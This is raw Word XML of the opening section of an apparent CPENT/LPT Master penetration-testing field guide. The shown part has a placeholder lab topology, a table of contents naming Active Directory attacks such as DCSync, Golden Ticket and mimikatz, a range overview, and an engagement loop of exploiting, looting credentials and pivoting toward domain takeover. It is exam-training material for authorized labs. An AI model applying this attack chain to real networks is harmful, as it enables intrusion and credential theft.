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E76C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>CPENT v2 / LPT Master Field Guide (Complete Edition) — Certified Penetration Testing Professional (EC-Council)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F0C82B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">The large, command-complete reference for </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPENT v2 (AI) / LPT Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, organized around the five ranges — </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory, Binary, IoT, Web, CTF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — with a deep </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivoting &amp; Double-Pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> core, expanded AD attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/reliability guidance, and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>full worked engagement chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>. Field-tested pivoting &amp; AD notes are folded in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BDA5B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Exam reality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a long, hands-on, multi-target engagement across five segmented ranges; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LPT Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> requires deep compromise + a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>professional report</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Graded on methodology, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pivoting into segmented internal networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, chaining across ranges, and documentation. Screenshot and note every step. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Authorized/lab use only.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> All commands target the CPENT ranges / lab you're authorized to test. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>IPs below are placeholder examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> — substitute your range's addressing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1434D2DE" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example lab topology (placeholders used throughout):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A413A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ATTACKER (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">you)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">     10.10.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F518D9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>PIVOT-1 (dual-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>homed)  eth</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>0 10.10.10.10    eth1 172.16.20.10     # first foothold (web DMZ host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7214F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>INTERNAL  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">tier-2)    172.16.20.0/24      TARGET1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.20.20  DC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.20.5  WP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255C3CB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>PIVOT-2 (dual-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>homed)  172.16.20.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">        172.16.30.20          # inside tier-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F451265" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">DEEP (tier-3)         172.16.30.0/24      TARGET2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.30.30  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>reachable only via PIVOT-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF89C1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="1172F9FA">
          <v:rect id="_x0000_i1187" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B47B84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>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F35EF4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>CPENT / LPT Master Overview &amp; the Five Ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E94FB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>Methodology &amp; the Engagement Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF60899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>Recon, Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB49DE4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>Pivoting &amp; Tunneling — Overview &amp; Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19F22C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>SSH Port Forwarding (Local, Remote, Dynamic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C3A41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 xml:space="preserve">Port Forwarding — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7003B942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 xml:space="preserve">Meterpreter Pivoting (autoroute, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>, SOCKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E71D86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>Chisel (Local, Remote, SOCKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126483F6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lastRenderedPageBreak/>
        <w:t>Double Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35272585" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Setup &amp; Pivot Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D73F27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>Active Directory Range — Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E7ADC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>AD Internals (NTDS, AD DS, Partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC0C89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>AD Recon (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ADRecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> &amp; friends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD9A99B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 xml:space="preserve">AD Attacks (Kerberos, Delegation, Lateral Movement, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4C5DDF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 xml:space="preserve">AD Persistence (Golden/Silver Ticket, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA278E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>Binary Exploitation Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C29A9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>IoT Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426FF46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>Web Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C1A31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>CTF Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2583B9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>Privilege Escalation (Windows &amp; Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B1358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>Worked Engagement — Full Chain (web → double pivot → DC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1361E738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 xml:space="preserve">Worked Engagement #2 — Exposed service → Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → SSH pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0176D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>Common Pitfalls &amp; Time Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF8065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>Reporting (the deliverable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD8DB0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Tooling Quick Reference &amp; Glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74218176" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="02ECB75A">
          <v:rect id="_x0000_i1188" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470749E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>1. CPENT / LPT Master Overview &amp; the Five Ranges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6160"/>
        <w:gridCol w:w="3665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="6FC3354D" w14:textId="77777777"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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2936A8D7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Range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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F818F9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What it tests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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38E2CC45" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Signature challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="0A14D8EA" w14:textId="77777777"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2EE0BAB1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Active Directory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7E66EB8B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve">Domain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F17F75">
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F17F75">
              <w:t>, Kerberos, lateral movement, DC compromise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4D672C21" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Reaching the DC through pivots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="63718EE8" w14:textId="77777777"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5CD24433" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Binary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098F4567" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Binary analysis + exploit dev (stack overflow, shellcode, ROP)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586630F8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Bad-char/offset work under time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="2527FAA9" w14:textId="77777777"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16843AF1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IoT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69D5EF2A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Device/firmware analysis, exposed services, protocol abuse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4F450043" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Firmware extraction + default creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="33F07CF4" w14:textId="77777777"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09C7E397" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Web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5472C230" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve">Web exploitation → foothold → </w:t>
            </w:r>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>internal pivot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51909D54" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Web host is the DMZ door inward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="678360B3" w14:textId="77777777"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2BF66386" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CTF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2654DF14" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Everything, chained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20FEBC1D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Time management across segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3621ADC3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LPT Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> = a high score across the ranges under time pressure, with a clean report. The defining difficulty is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">: targets sit behind </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivots and double pivots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, so tunneling mastery (§4–10) is the single biggest score multiplier. The web/IoT hosts are typically </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dual-homed</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> into the AD range — the intended path is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the edge → pivot → own the domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513D98C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="4E42AEC4">
          <v:rect id="_x0000_i1189" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="258DA32E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>2. Methodology &amp; the Engagement Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9F4F3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per target/segment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> recon → enumerate → exploit → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>loot creds</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>discover the next segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">) → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivot/route</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → repeat → document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6F4EF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Notes template (per host):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F2274" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>HOST 172.16.20.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79ADBB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Interfaces :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> eth0 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.20.20  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>+ eth1 172.16.30.20 -&gt; reaches 172.16.30.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AC6DC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Services </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
